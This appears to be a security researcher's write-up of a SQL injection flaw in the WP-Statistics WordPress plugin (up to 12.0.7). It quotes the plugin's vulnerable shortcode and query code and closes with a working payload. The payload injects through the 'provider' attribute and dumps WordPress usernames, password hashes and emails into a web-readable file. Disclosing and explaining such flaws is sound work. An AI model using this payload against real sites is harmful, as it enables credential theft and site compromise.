WP-Statistics Plugin SQL Injection Vulnerability Analysis

Requirements:

WP-Statistics Plugin Version <= 12.0.7
Least Permission account  : Subscriber account (with post edit permission)

Why it easy to exploit?

This vulnerability is caused by the lack of sanitization in user provided data.
An attacker with at least a subscriber account could leak sensitive data and under the right circumstances/configurations compromise your WordPress installation.

How it actually Works?

WordPress provides an API that enables developers to create content that users caninject to certain pages just using a simple shortcode:

[shortcode atts_1=”test” atts_2=”test”]

Among other functionalities, WP Statistics allows admin users to get detailed information related with the number of visits by just calling the shortcode below:

//wp-content/plugins/wp-statistics-12.0.7/shortcode.php <?php add_shortcode( 'wpstatistics', 'wp_statistics_shortcodes' ); add_filter( 'widget_text', 'do_shortcode' ); function wp_statistics_shortcodes( $atts ) { /* WP Statitics shortcode is in the format of: [wpstatistics stat=xxx time=xxxx provider=xxxx format=xxxxxx id=xxx] Where: stat = the statistic you want. time = is the timeframe, strtotime() (http://php.net/manual/en/datetime.formats.php) will be used to calculate it. provider = the search provider to get stats on. format = i18n, english, none. id = the page/post id to get stats on. */ if ( ! is_array( $atts ) ) { return; } if ( ! array_key_exists( 'stat', $atts ) ) { return;} if ( ! array_key_exists( 'time', $atts ) ) { $atts['time'] = null; } if ( ! array_key_exists( 'provider', $atts ) ) { $atts['provider'] = 'all';} if ( ! array_key_exists( 'format', $atts ) ) { $atts['format'] = null;} if ( ! array_key_exists( 'id', $atts ) ) { $atts['id'] = - 1; } $formatnumber = array_key_exists( 'format', $atts ); switch ( $atts['stat'] ) { case 'usersonline': $result = wp_statistics_useronline(); break; case 'visits': $result = wp_statistics_visit( $atts['time'] ); break; case 'visitors': $result = wp_statistics_visitor( $atts['time'], null, true ); break; case 'pagevisits': $result = wp_statistics_pages( $atts['time'], null, $atts['id'] ); break; case 'searches': $result = wp_statistics_searchengine( $atts['provider'], $atts['time'] ); break; }  

a1.The WP Statistics shortcode that allows admins to obtain detailed visit information.

For example :  WP-Statistics  Shortcode

    User Online: [wpstatistics stat=usersonline]
    Today Visitor: [wpstatistics stat=visitors time=today]
    Today Visit: [wpstatistics stat=visits time=today]
    Yesterday Visitor: [wpstatistics stat=visitors time=yesterday]
    Yesterday Visit: [wpstatistics stat=visits time=yesterday]
    Total Visitor: [wpstatistics stat=visitors time=total]
    Total Visit: [wpstatistics stat=visits time=total]

 

As you can see on the above code a1, some attributes of the shortcode wpstatistics are being passed as parameters for important functions and this shouldn’t be a problem if those parameters were sanitized,but as we’ll see this is not the case.

For example:  $result = wp_statistics_searchengine( $atts['provider'], $atts['time'] );

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php function wp_statistics_searchengine( $search_engine = 'all', $time = 'total' ) { global $wpdb, $WP_Statistics; // Determine if we're using the old or new method of storing search engine info and build the appropriate table name. $tablename = $wpdb->prefix . 'statistics_'; if ( $WP_Statistics->get_option( 'search_converted' ) ) { $tablename .= 'search'; } else { $tablename .= 'visitor'; } // Get a complete list of search engines var_dump($search_engine); $search_query = wp_statistics_searchengine_query( $search_engine ); var_dump($search_query); // This function accepts several options for time parameter, each one has a unique SQL query string. // They're pretty self explanatory. switch ( $time ) { case 'today': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" ); break; case 'yesterday': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -1 )}' AND {$search_query}" ); break; case 'week': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -7 )}' AND {$search_query}" ); break; case 'month': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -30 )}' AND {$search_query}" ); break; case 'year': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -365 )}' AND {$search_query}" ); break; case 'total': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE {$search_query}" ); break; default: $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', $time)}' AND {$search_query}" ); break; } return $result; }

One of the vulnerable functions wp_statistics_searchengine_query() in the file “includes/functions/functions.php” is accessible through WordPress’ AJAX functionality through function wp_ajax_parse_media_shortcode().

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php function wp_statistics_searchengine_query( $search_engine = 'all' ) { GLOBAL $WP_Statistics; // Get a complete list of search engines $searchengine_list = wp_statistics_searchengine_list(); $search_query = ''; if ( $WP_Statistics->get_option( 'search_converted' ) ) { // Are we getting results for all search engines or a specific one? if ( strtolower( $search_engine ) == 'all' ) { // For all of them? Ok, look through the search engine list and create a SQL query string to get them all from the database. foreach ( $searchengine_list as $key => $se ) { $search_query .= "`engine` = '{$key}' OR "; } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { $search_query .= "`engine` = '{$search_engine}'"; } } else { // Are we getting results for all search engines or a specific one? if ( strtolower( $search_engine ) == 'all' ) { // For all of them? Ok, look through the search engine list and create a SQL query string to get them all from the database. // NOTE: This SQL query can be long. foreach ( $searchengine_list as $se ) { // The SQL pattern for a search engine may be an array if it has to handle multiple domains (like google.com and google.ca) or other factors. if ( is_array( $se['sqlpattern'] ) ) { foreach ( $se['sqlpattern'] as $subse ) { $search_query .= "`referred` LIKE '{$subse}' OR "; } } else { $search_query .= "`referred` LIKE '{$se['sqlpattern']}' OR "; } } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { // For just one? Ok, the SQL pattern for a search engine may be an array if it has to handle multiple domains (like google.com and google.ca) or other factors. if ( is_array( $searchengine_list[ $search_engine ]['sqlpattern'] ) ) { foreach ( $searchengine_list[ $search_engine ]['sqlpattern'] as $se ) { $search_query .= "`referred` LIKE '{$se}' OR "; } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { $search_query .= "`referred` LIKE '{$searchengine_list[$search_engine]['sqlpattern']}'"; } } } return $search_query; }

This function doesn’t check for additional privileges, allowing subscribers to execute this shortcode and inject malicious data to its attributes.

In a number places in the code, user input coming from attributes of the wpstatistics’ shortcode are included in SQL queries without being sanitized. Below one of the queries that were exploitable:
 

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php $search_query = wp_statistics_searchengine_query( $search_engine ); // This function accepts several options for time parameter, each one has a unique SQL query string. // They're pretty self explanatory. switch ( $time ) { case 'today': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" ); break; case 'yesterday': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -1 )}' AND {$search_query}" ); break; case 'week': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -7 )}' AND {$search_query}" ); break; case 'month': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -30 )}' AND {$search_query}" ); break; case 'year': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -365 )}' AND {$search_query}" ); break; case 'total': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE {$search_query}" ); break; default: $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', $time)}' AND {$search_query}" ); break; } return $result; }

The wp_statistics_searchengine_query() basically returns the same value as the one passed in the shortcode attribute provider and its content is added directly to the raw SQL query.

Exploit Phase:

When user (subscriber) enter shortcode in post  as  [wpstatistics stat="searches" provider="Google"]

it will call  wp_statistics_searchengine() with provider="Google", then it call another function wp_statistics_searchengine_query( ), as a result it form a SQL query  and stored in variable in $search_query.

 $search_query .= "`engine` = '{$search_engine}'";

Here  search engine = "Google". which will be as  $search_query = "`engine` = 'Google'"

It is directly input in most of the SQL queries i.e see below SQL queries statement

$result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" );

so user input is not sanitized on parameter provider, so which allow user to injection any  malicious queries to fetch data from database

For Example:
 This payload will get username, password and email from database and stored into test.txt file.

[wpstatistics stat="searches" provider="123' union select 1,2,user_login,user_pass,user_email,6 from wp_users into outfile '/var/www/html/waf-demo/wp-content/uploads/test.txt'#"]

Demo Video:

Credits:

•  Umar Farook: [Security Engineer | Researcher]
•  FOS Team : [Fools of Security]

 Support !

•  Email address:[FOS]  for more details.
•  Github:[FOS]
•  Youtube: [FOS] 

Disclaimer: For Educational purpose only, We DO NOT take responsibility of any harm caused by this method to any one or any organization.